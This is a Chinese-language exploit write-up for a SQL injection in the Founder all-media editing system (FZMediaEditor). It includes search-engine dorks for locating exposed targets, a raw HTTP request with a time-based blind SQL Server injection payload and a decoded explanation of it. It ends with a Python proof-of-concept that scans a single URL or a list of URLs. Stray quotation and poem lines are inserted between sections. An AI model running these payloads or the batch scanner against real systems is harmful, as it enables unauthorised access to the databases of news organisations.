声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
漏洞描述
方正全媒体采编系统(FZMediaEditor)是一款专业的新闻采编系统,用于新闻机构、媒体公司等组织进行新闻的采编、编辑和发布管理。其binary.do接口的pTableName参数对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
漏洞复现
1)信息收集
fofa:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
hunter:web.body="/newsedit/newsedit/"||app.name="北大方正全媒体采编系统"
我们的科学永远只是找到近似真理。
2)构造数据包
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host:ip
Content-Type: application/x-www-form-urlencoded
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
代码分析
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
这个payload经过URL编码,我们首先需要对其进行解码。URL编码通常用百分号(%)后跟两位十六进制数来表示特殊字符。下面是解码后的payload:
TableName=DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5'; select DOM_IMAGE from IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
现在我们来分析这个解码后的payload:
TableName=DOM_IMAGE where REFID=-1:
- 这是尝试访问名为
DOM_IMAGE的表,并添加了一个条件REFID=-1。但通常TableName不应该包含where子句,这是SQL注入的一部分。
- 这是尝试访问名为
union select ‘1’;:
- 这里使用了
UNION操作符,尝试执行一个简单的select语句,返回字符串'1'。
- 这里使用了
WAITFOR DELAY ‘0:0:5’;:
- 这行代码是SQL Server特有的,用于使当前SQL语句执行延迟5秒。这通常用于时间盲注攻击,攻击者通过测量SQL语句的执行时间来推断数据库中的信息。
select DOM_IMAGE from IMG_LARGE_PATH:
- 这又是一个
SELECT语句,尝试从IMG_LARGE_PATH表中选择DOM_IMAGE字段。
- 这又是一个
&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1:
- 这些参数是Web表单的一部分,被用于构造SQL查询。
响应时间延迟5秒,存在sql注入。
测试工具
poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarning
# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# 定义红色和重置终端输出格式的常量
RED = '\033[91m'
RESET = '\033[0m'
def check_vulnerability(url):
"""
检查给定URL是否存在特定的SQL注入漏洞。
:param url: 要检查的URL
"""
try:
# 构造攻击URL和payload
attack_url = url.rstrip('/') + "/newsedit/newsplan/task/binary.do"
attack_payload = """TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A3%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1"""
# 设置请求头信息
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept-Encoding': 'gzip, deflate'
}
# 记录请求开始时间
start_time = time.time()
# 发送POST请求
response = requests.post(attack_url, headers=headers, data=attack_payload, verify=False, timeout=10)
# 计算请求耗时
elapsed_time = time.time() - start_time
# 根据耗时判断是否存在漏洞
if 3 < elapsed_time < 5:
print(f"{RED}URL [{url}] 可能存在方正全媒体采编系统binary.do存在SQL注入漏洞{RESET}")
else:
print(f"URL [{url}] 不存在漏洞")
except requests.exceptions.Timeout:
# 请求超时,提示可能存在漏洞
print(f"URL [{url}] 请求超时,可能存在漏洞")
except requests.RequestException as e:
# 请求异常,打印错误信息
print(f"URL [{url}] 请求失败: {e}")
def main():
"""
程序主入口,负责解析命令行参数并调用漏洞检查函数。
"""
# 解析命令行参数
parser = argparse.ArgumentParser(description='检测目标地址是否存在方正全媒体采编系统binary.do存在SQL注入漏洞')
parser.add_argument('-u', '--url', help='指定目标地址')
parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')
args = parser.parse_args()
# 处理命令行参数
if args.url:
# 添加http协议头如果缺失
if not args.url.startswith("http://") and not args.url.startswith("https://"):
args.url = "http://" + args.url
check_vulnerability(args.url)
elif args.file:
# 读取文件中的所有URL并检查
with open(args.file, 'r') as file:
urls = file.read().splitlines()
for url in urls:
# 添加http协议头如果缺失
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
check_vulnerability(url)
if __name__ == '__main__':
main()
运行截图
须晴日,看红装素裹,分外妖娆。
